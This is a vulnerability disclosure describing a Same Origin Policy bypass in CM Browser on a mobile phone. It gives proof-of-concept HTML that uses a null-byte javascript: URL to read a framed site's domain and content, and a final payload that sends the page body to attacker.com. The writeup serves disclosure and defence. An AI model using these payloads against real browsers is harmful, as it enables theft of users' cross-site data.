CM Browser SOP Bypass

`#Vulnerability: CM Browser Same Origin Policy Bypass  
#Impact: High/Critical  
#Authors: Rafay Baloch  
#Company: RHAinfoSEC  
#Website: http://rhainfosec.com & http://rafayhackingarticles.net  
  
*Introduction*  
  
  
Same Origin Policy (SOP) is one of the most important security mechanisms  
that are applied in modern browsers, the basic idea behind the SOP is the  
javaScript from one origin should not be able to access the properties of a  
website on another origin. The origin is formed by the combination of  
Scheme, domain and port with the port being an exception to IE. There are  
some exceptions with SOP such the location property, objects wtih src  
attribute. However, the fundamental are that different origins should not  
be able to access the properties of one another.  
  
  
*SOP Bypass*  
  
  
A SOP bypass occurs when a sitea.com is some how able to access the  
properties of siteb.com such as cookies, location, response etc. Due to the  
nature of the issue and potential impact, this is very rarely found in  
modern browsers. However, they are found once in a while. The following  
writeup describes a SOP bypass vulnerability i found in my Qmobile Noir A20  
with CM browser latest version.  
  
The following is a proof of concept:  
  
  
*Proof Of Concept *  
  
  
<iframe name="test" src="http://www.rhainfosec.com"></iframe>  
  
<input type=button value="test"  
  
onclick="window.open('\u0000javascript:alert(document.domain)','test')" >  
  
  
As you can see that the code tries accessing the document.domain property  
of a site loaded into an iframe. If you run the POC at attacker.com on any  
of the modern browsers, it would return a similar error as attacker.com  
should not be able to access the document.domain property of rhainfosec.com.  
  
Blocked a frame with origin "http://jsbin.com" from accessing a frame with  
origin "http://www.rhainfosec.com". Protocols, domains, and ports must  
match.  
  
1. vagugebiweja:7  
  
  
However, running it on any of the vulnerable smart phones default browsers  
would alert the document.domain property indicating that the SOP was not  
able to restrict the access to document.domain property of a site at a  
different origin.  
  
  
I created the following POC, so you can mess around with some stuff:  
  
  
*Reading the response*  
  
  
You can read the response of any page by accessing the  
document.body.innerHTML property.  
  
  
<iframe name="test" src="http://www.rhainfosec.com"></iframe>  
  
<input type=button value="test"  
  
onclick="window.open('\u0000javascript:alert(document.body.innerHTML)','test')"  
>  
  
  
*Stealing the response and sending it to an attackers domain*  
  
  
In real world situation an attacker would send the response to his  
controlled domain.  
  
  
<iframe name="test" src="http://www.rhainfosec.com"></iframe>  
  
<input type=button value="test"  
  
onclick="window.open('\u0000javascript:var i=new Image();i.src='//  
attacker.com?'+document.body.innerHTML;document.body.appendChild(i);  
','test')"  
>  
`